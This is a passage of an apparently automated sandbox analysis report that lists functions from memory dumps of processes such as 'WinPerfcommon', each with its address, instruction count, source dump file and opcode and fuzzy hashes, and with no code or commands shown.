                                                                                      Function 00007FFD9B800B77 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a48aa04dd933b7f9607f55611fdd70f7dd7a5a476e7c864248b1a25c5f65d4e7
                                                                                      • Instruction ID: 4d8e96407308b7ad11e51ec8f0f7d576b2f2d0bafdbdf749fd1b2002a6cddd40
                                                                                      • Opcode Fuzzy Hash: a48aa04dd933b7f9607f55611fdd70f7dd7a5a476e7c864248b1a25c5f65d4e7
                                                                                      • Instruction Fuzzy Hash: FFE02230209A49CFC702AB38CC944D17BA0EF0A204BEA10AED089CB226D2205969CB40
                                                                                      Function 00007FFD9BC10A29 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 935c9b44d59da3ba4f45107f5db24debba9c4ee1d9ee67c93d9d1c5b6896c1cd
                                                                                      • Instruction ID: f090aebf225a8ab6f7741be2ed230e450b30afe48c802e8ffb60eb05e9314751
                                                                                      • Opcode Fuzzy Hash: 935c9b44d59da3ba4f45107f5db24debba9c4ee1d9ee67c93d9d1c5b6896c1cd
                                                                                      • Instruction Fuzzy Hash: C4E06D31B0E50E8AE761DA64D870BEC3392EB90720F166276C019972D5DE386A828B80
                                                                                      Function 00007FFD9B805447 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                                      • Instruction ID: 5766eb55b7bf27a45f86b47819611d301f067fce88e86259edf70750324ecb91
                                                                                      • Opcode Fuzzy Hash: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                                      • Instruction Fuzzy Hash: 7BE01234B0A01A47F774A798C8607E92260EF89350F564178E99E933D5DD2CAF418B05
                                                                                      Function 00007FFD9B806A7D Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f87a4643ea699791b6c32c08043d0292577b503dce9a57c1912294ac2bb80f3f
                                                                                      • Instruction ID: 40132ae1a088eb110378cd6a088e98db4327c734af28aa91476354695eb786c2
                                                                                      • Opcode Fuzzy Hash: f87a4643ea699791b6c32c08043d0292577b503dce9a57c1912294ac2bb80f3f
                                                                                      • Instruction Fuzzy Hash: C0E08C02F2D48A0AF36CA7A848363F85181DF9A754F4A41B9A49EC32E3DC0C29800392
                                                                                      Function 00007FFD9BC12D47 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 032a89b87a93e6b6c14d87f0f6b8866b1f08bc943014956a1f46d5f8b6496e9e
                                                                                      • Instruction ID: 18379a8b15f5639e02d308553ad2d6615e33d6a21b075b2b2c36a9631f7619b8
                                                                                      • Opcode Fuzzy Hash: 032a89b87a93e6b6c14d87f0f6b8866b1f08bc943014956a1f46d5f8b6496e9e
                                                                                      • Instruction Fuzzy Hash: 3AE0C255B0E2864FEB3A17F048B007D2AA08F0B389B0B18B2D0898E1E3D848290D8321
                                                                                      Function 00007FFD9B8006A5 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d219e769d2fde12c7450e079baa21683eee67dbf60759a0515fd54ed3aef9aa
                                                                                      • Instruction ID: e9f740925ef3dd57971de09cd668f8d68662c7b6956a6cfd56898a7d1c43276f
                                                                                      • Opcode Fuzzy Hash: 6d219e769d2fde12c7450e079baa21683eee67dbf60759a0515fd54ed3aef9aa
                                                                                      • Instruction Fuzzy Hash: 68C00205F6BA5E01E83573EA98660ECA1415FDEA95FD60172D5A8401A19C8D22D50256
                                                                                      Function 00007FFD9BC1B7CA Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a73059b50bb1746efb1391f0e5e9a51a054cb80d6278c597c3da76b3a3a83e81
                                                                                      • Instruction ID: eb5bef9835a8ad3bc0a5256cb52aad2039b936f41d67d694cc5e482c998909cf
                                                                                      • Opcode Fuzzy Hash: a73059b50bb1746efb1391f0e5e9a51a054cb80d6278c597c3da76b3a3a83e81
                                                                                      • Instruction Fuzzy Hash: FDC02B21F0540C0EE74065AC74091F8B3C0CB84121790103BEC08C0369CC6E84820740
                                                                                      Function 00007FFD9B800B18 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac08d3592d3d8194044a73ad7b904a2861d7badd4d702d5ae38e67d6fd400711
                                                                                      • Instruction ID: 0517323c1cf538509cb652ed8513e120c92768985ecce466a021c5324352082c
                                                                                      • Opcode Fuzzy Hash: ac08d3592d3d8194044a73ad7b904a2861d7badd4d702d5ae38e67d6fd400711
                                                                                      • Instruction Fuzzy Hash: 0CC08C305118088FD900F72CC88484032A0FF0D210BC20090E80DC7174E21A9C80C700
                                                                                      Function 00007FFD9B801280 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                                      • Instruction ID: e42b8875bcd61afac6b1820998bdbf33e45a8790c8f06b221093bb0e93e5e23a
                                                                                      • Opcode Fuzzy Hash: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                                      • Instruction Fuzzy Hash: 16C08C30A1180C8FC908EB28C88480833A0FF0D200FC20090E009C7170D229DCC1C741
                                                                                      Function 00007FFD9BC1382B Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e5cbd3cfa7109d848861f8cb4e40c845cf41b60e34970c5814db506dcaceb96f
                                                                                      • Instruction ID: 9c0cdabe21aa29fd12eb5982fdfb78c7e0797eb52e74a4e298f017a8e2bfe41c
                                                                                      • Opcode Fuzzy Hash: e5cbd3cfa7109d848861f8cb4e40c845cf41b60e34970c5814db506dcaceb96f
                                                                                      • Instruction Fuzzy Hash: 9BD0C910B1F54FE5F23847E1407033D66919FC4B08FA6A03EC05F619E2CD1CB7056221
                                                                                      Function 00007FFD9BC18E9B Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ebeeac633981811f440f24dc428ede6e1b923328e8921b68886751452bcad740
                                                                                      • Instruction ID: 37b01ea26f008c18e8202c65bdea665ac0444b24f9b4d0fcba9a747bf563832f
                                                                                      • Opcode Fuzzy Hash: ebeeac633981811f440f24dc428ede6e1b923328e8921b68886751452bcad740
                                                                                      • Instruction Fuzzy Hash: 54D0C918B2F61F85F278C6A1457467E51958F49B00F62643DC05F719E1CD6D7B026603
                                                                                      Function 00007FFD9BC1E15B Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bc64aa7da69b7b9fe02f97649f9e105181387af2dcc0b02bfe2e5b9fc28fb6b7
                                                                                      • Instruction ID: ebbd5b0d9f4d34e1e9672137f9968612a5751f6f662e2f92dbca03c0f8606f96
                                                                                      • Opcode Fuzzy Hash: bc64aa7da69b7b9fe02f97649f9e105181387af2dcc0b02bfe2e5b9fc28fb6b7
                                                                                      • Instruction Fuzzy Hash: 41D09220F0E50F85F27946A2803023E61A19F05B00FB2213ED49FE19E2891CB7016302
                                                                                      Function 00007FFD9B803A97 Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 139a16ba8ce3d20e0d8956912c52d73fffb1872de6e45a7462b495855d9261e8
                                                                                      • Instruction ID: 64720a9a975ac2f98f050c74386a4bb32cfa0fc29601c3b47288ea22ac02ba6e
                                                                                      • Opcode Fuzzy Hash: 139a16ba8ce3d20e0d8956912c52d73fffb1872de6e45a7462b495855d9261e8
                                                                                      • Instruction Fuzzy Hash: 96C04C11F19C5E06F759621858319FF44439F85718FD605B8F02E8B7DFDD1C5A021287
                                                                                      Function 00007FFD9BC163C5 Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
                                                                                      • Instruction ID: 3747d6f2ffa998ee3625d162b53f13a19282a14bfc4d593eb93e9ea537ccd5fc
                                                                                      • Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
                                                                                      • Instruction Fuzzy Hash: EAC04C303048589FDB94DA5DC0D4B38B3E1EF59301B5100B4E04ADB2B5C9289D459710
                                                                                      Function 00007FFD9B8006C8 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                                      • Instruction ID: 5b2b6be7fe9d7b9ac1437a1747dff3e6dc568b9049d2510e53f91ab7c16bc57d
                                                                                      • Opcode Fuzzy Hash: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                                      • Instruction Fuzzy Hash: 2DB01200D6B80F00E43433FB08630E470405F4D184FC20070D49C401919C8D13D40342
                                                                                      Function 00007FFD9B8030A2 Relevance: .0, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93392ab90d022bd13f455c37e4a11f286119ada3faa7d07432c4d4a48e4322fa
                                                                                      • Instruction ID: 75abd2b8f716c4ef0c70bfac92070791e2660a99438b1b124729dc8f78b09b9e
                                                                                      • Opcode Fuzzy Hash: 93392ab90d022bd13f455c37e4a11f286119ada3faa7d07432c4d4a48e4322fa
                                                                                      • Instruction Fuzzy Hash: B6B01211E0E01EC6F3A4A394C4606FC11884F0A360F47443AE44DA71E1DD0D2D414752
                                                                                      Function 00007FFD9BC12F4A Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68f34c3b3e72bf3d437eb4902a45668d135c994d5871d7ce3bcb564642de3738
                                                                                      • Instruction ID: 6cf818e15f173c9e360c4cb68326bdd0f01d0df6c55a9b55e0c84be267539eba
                                                                                      • Opcode Fuzzy Hash: 68f34c3b3e72bf3d437eb4902a45668d135c994d5871d7ce3bcb564642de3738
                                                                                      • Instruction Fuzzy Hash: 44A00214F0E95E89E0717BF444A21BD40413F49705B6254B1D00E999B6CD5CAB066687

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD9BC10575 Relevance: .2, Instructions: 225COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 38d359173d2be75e3c85eb8ce0c9f1ecc406b6c0278ad6f226885d37c486f88e
                                                                                      • Instruction ID: 0977c23c5da924fb8a66c7599e72e0c20e7e9f2e0e6ab6dfe0cbcffe48b640ee
                                                                                      • Opcode Fuzzy Hash: 38d359173d2be75e3c85eb8ce0c9f1ecc406b6c0278ad6f226885d37c486f88e
                                                                                      • Instruction Fuzzy Hash: 04917F30A1960E8FE758DB68C4A5AFD77F1FF48300F95047AD01ADB2A5DE39A941CB80

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B7E0B3F Relevance: 3.8, Strings: 3, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: c9$!k9$"s9
                                                                                      • API String ID: 0-3426396564
                                                                                      • Opcode ID: 50c1d64d61a515129e296782c9a8d097f4e4c7089f5326616a06570c3142bd2f
                                                                                      • Instruction ID: a70d7bb78581e6be78d286c0f343f4d345591ee1ef8c754b6bc7eac07e7106ba
                                                                                      • Opcode Fuzzy Hash: 50c1d64d61a515129e296782c9a8d097f4e4c7089f5326616a06570c3142bd2f
                                                                                      • Instruction Fuzzy Hash: 84F0782732DA6A8BC7017B7DFC401D5BB80EF86136BD901BBD200CB262E210181AC3D0
                                                                                      Function 00007FFD9BBF05F2 Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: _^
                                                                                      • API String ID: 0-1181316905
                                                                                      • Opcode ID: 48ce66e77320702a0da773c3cca8d2ea56a2cece3111390f6c486be48569471f
                                                                                      • Instruction ID: c03d902e82a8af31143c9cfa48e27335c9d570ef44799f4f7a9a2de869d0b87f
                                                                                      • Opcode Fuzzy Hash: 48ce66e77320702a0da773c3cca8d2ea56a2cece3111390f6c486be48569471f
                                                                                      • Instruction Fuzzy Hash: 5BD13E22B0E5CA0FE325ABA898755E43FA0FF51718F4A41F7C499CB0F3ED2869458341
                                                                                      Function 00007FFD9B7E0D48 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5Z_H
                                                                                      • API String ID: 0-3267294416
                                                                                      • Opcode ID: de8357e731d23e0487f2be5eb87e35ddbc9a17cb83f51d822dce6761eecf6fea
                                                                                      • Instruction ID: b1d87dc7210562b81192564ea6db5c76d22213d680cce00acf560f4987ea7937
                                                                                      • Opcode Fuzzy Hash: de8357e731d23e0487f2be5eb87e35ddbc9a17cb83f51d822dce6761eecf6fea
                                                                                      • Instruction Fuzzy Hash: 5351F461B09A8D4FE759EF688876BA8BFE1FF95700F4501BAD049C72F6DE6828118740
                                                                                      Function 00007FFD9BBF4348 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: af0455c12ff8d1be79ab721c8972c82b1e9ee8f770ef166a72eefb09ac235005
                                                                                      • Instruction ID: fbaebddc4241c2d9b6704cbd879f8a43de8fd9e102e036da595bba6c536a1c52
                                                                                      • Opcode Fuzzy Hash: af0455c12ff8d1be79ab721c8972c82b1e9ee8f770ef166a72eefb09ac235005
                                                                                      • Instruction Fuzzy Hash: 83513B31F0964E8FEB68EB9984605ADBBB1FF49304F1145BED01AE72D5DA382A058B50
                                                                                      Function 00007FFD9BBF99B8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 0bfe309ba8d189e80bbe5e0d8cdf0305029a8dd4328833c3c691ff59395d7fe1
                                                                                      • Instruction ID: b6c4d1540516b349c1914933f2b8ba60eb3bb2ac9ce882bf7884ce9c1b91261e
                                                                                      • Opcode Fuzzy Hash: 0bfe309ba8d189e80bbe5e0d8cdf0305029a8dd4328833c3c691ff59395d7fe1
                                                                                      • Instruction Fuzzy Hash: E9515E71F0954E8BDB68EB98C4655FCBBB1FF44304F1240BAC05EA72E6CA396901CB50
                                                                                      Function 00007FFD9BBF45B5 Relevance: .4, Instructions: 424COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1e8e70492f2cfb09c3ec72f2b70f0d02df33215da3718fd66272c12804edb
                                                                                      • Instruction ID: d5e2a71aa819ea47afa5821e6d4d3fcdba6d05b4992006053f50356a7e5b74e9
                                                                                      • Opcode Fuzzy Hash: 67d1e8e70492f2cfb09c3ec72f2b70f0d02df33215da3718fd66272c12804edb
                                                                                      • Instruction Fuzzy Hash: 7CF1C330B1955A8FEB68DF59C0E06B53BA1FF45314B5141BDC84E8B6DADA38F981CB80
                                                                                      Function 00007FFD9BBF9C2F Relevance: .4, Instructions: 423COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 196b2501039b88f0736d8ee6b93288d3a7ee6c2b3b970ba8be9de8cfaa6c07e3
                                                                                      • Instruction ID: e7f205f723bb4c81f6ad19f6f1449985699652e3971e8f9a8bf9dfa0bb18d192
                                                                                      • Opcode Fuzzy Hash: 196b2501039b88f0736d8ee6b93288d3a7ee6c2b3b970ba8be9de8cfaa6c07e3
                                                                                      • Instruction Fuzzy Hash: 03F1E130B196498FEB59DF58C4E46B43BA1FF45314B5541BDC88E8B6DACA38F981CB80
                                                                                      Function 00007FFD9BBFAC71 Relevance: .4, Instructions: 420COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7ab0aa0895d2f2b5bef96a01b38f55b9522e8f3818424bcc8bb048a6f8c1b72
                                                                                      • Instruction ID: 2ab73957d6e74783c5e5abe6abff1e5d545009462bf9eb2980d848ad39703457
                                                                                      • Opcode Fuzzy Hash: a7ab0aa0895d2f2b5bef96a01b38f55b9522e8f3818424bcc8bb048a6f8c1b72
                                                                                      • Instruction Fuzzy Hash: 59E1F430B0EA4E8FD378EB68C4A46757BE1FF44308B25057EC49EC76E2DA29B9418741
                                                                                      Function 00007FFD9BBF5601 Relevance: .4, Instructions: 409COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a54b5586708bde7cb59c192a9e0276d68e0c423f1062bba040a49f9bbbe4338
                                                                                      • Instruction ID: 7684d860d651bd57bd3828cb4fb39df9359f9c0f78d8b8d328c645312a2ad30e
                                                                                      • Opcode Fuzzy Hash: 1a54b5586708bde7cb59c192a9e0276d68e0c423f1062bba040a49f9bbbe4338
                                                                                      • Instruction Fuzzy Hash: 41D1F230B0EB4A8FD778EBA8D4A05757BE1FF44318B15457EC08E876E2DA29B942C741
                                                                                      Function 00007FFD9BBFCC10 Relevance: .4, Instructions: 358COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50ed34bc917e4e29ec153efaa77ea9c8aa36231c2cf6b065265db81847c61112
                                                                                      • Instruction ID: 4f556b9d027dac1ee34318c2ad95738d5d01e71e678d4dce9c739e2987487148
                                                                                      • Opcode Fuzzy Hash: 50ed34bc917e4e29ec153efaa77ea9c8aa36231c2cf6b065265db81847c61112
                                                                                      • Instruction Fuzzy Hash: CAB1A434B18A1D8FDB58EF58C8959B9B7E2FF99314B1141A9D04EC72A6CA35FC42CB40
                                                                                      Function 00007FFD9BBF17C4 Relevance: .4, Instructions: 353COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
